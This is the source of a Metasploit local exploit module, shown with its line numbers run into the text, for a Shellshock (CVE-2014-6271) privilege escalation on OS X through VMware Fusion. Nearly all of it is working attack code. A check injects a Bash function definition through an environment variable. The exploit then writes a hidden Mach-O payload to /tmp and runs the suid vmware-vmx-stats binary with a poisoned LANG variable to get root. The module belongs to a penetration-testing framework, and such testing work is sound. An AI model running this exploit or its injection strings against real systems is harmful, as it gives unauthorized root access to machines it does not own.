Path: blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = NormalRanking78include Msf::Post::File9include Msf::Post::OSX::Priv10include Msf::Exploit::EXE11include Msf::Exploit::FileDropper1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)',18'Description' => %q{19This module exploits the Shellshock vulnerability, a flaw in how the Bash shell20handles external environment variables. This module targets the VMWare Fusion21application, allowing an unprivileged local user to get root access.22},23'License' => MSF_LICENSE,24'Author' => [25'Stephane Chazelas', # discovered the bash bug26'juken', # discovered the VMWare priv esc27'joev', # msf module28'mubix' # vmware-vmx-stats29],30'References' => [31[ 'CVE', '2014-6271' ],32[ 'CWE', '94' ],33[ 'OSVDB', '112004' ],34[ 'EDB', '34765' ]35],36'Platform' => 'osx',37'Arch' => [ ARCH_X64 ],38'SessionTypes' => [ 'shell', 'meterpreter' ],39'Targets' => [40[41'Mac OS X 10.9 Mavericks x64 (Native Payload)',42{43'Platform' => 'osx',44'Arch' => ARCH_X6445}46]47],48'DefaultTarget' => 0,49'DisclosureDate' => '2014-09-24',50'Notes' => {51'AKA' => ['Shellshock'],52'Stability' => UNKNOWN_STABILITY,53'Reliability' => UNKNOWN_RELIABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options [60OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),61]62register_advanced_options [63OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])64]65end6667def base_dir68datastore['WritableDir'].to_s69end7071def upload(path, data)72print_status "Writing '#{path}' (#{data.size} bytes) ..."73write_file path, data74register_file_for_cleanup path75end7677def check78check_str = Rex::Text.rand_text_alphanumeric(5)79# ensure they are vulnerable to bash env variable bug80if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&81cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/8283CheckCode::Vulnerable84else85CheckCode::Safe86end87end8889def exploit90if is_root?91fail_with Failure::BadConfig, 'Session already has root privileges'92end9394if check != CheckCode::Vulnerable95fail_with Failure::NotVulnerable, 'Target is not vulnerable'96end9798unless writable? base_dir99fail_with Failure::BadConfig, "#{base_dir} is not writable"100end101102payload_file = "#{base_dir}/.#{Rex::Text::rand_text_alpha_lower(8..12)}"103exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)104upload payload_file, exe105cmd_exec "chmod +x #{payload_file}"106107print_status 'Running VMWare services...'108path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary109cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")110end111end112113114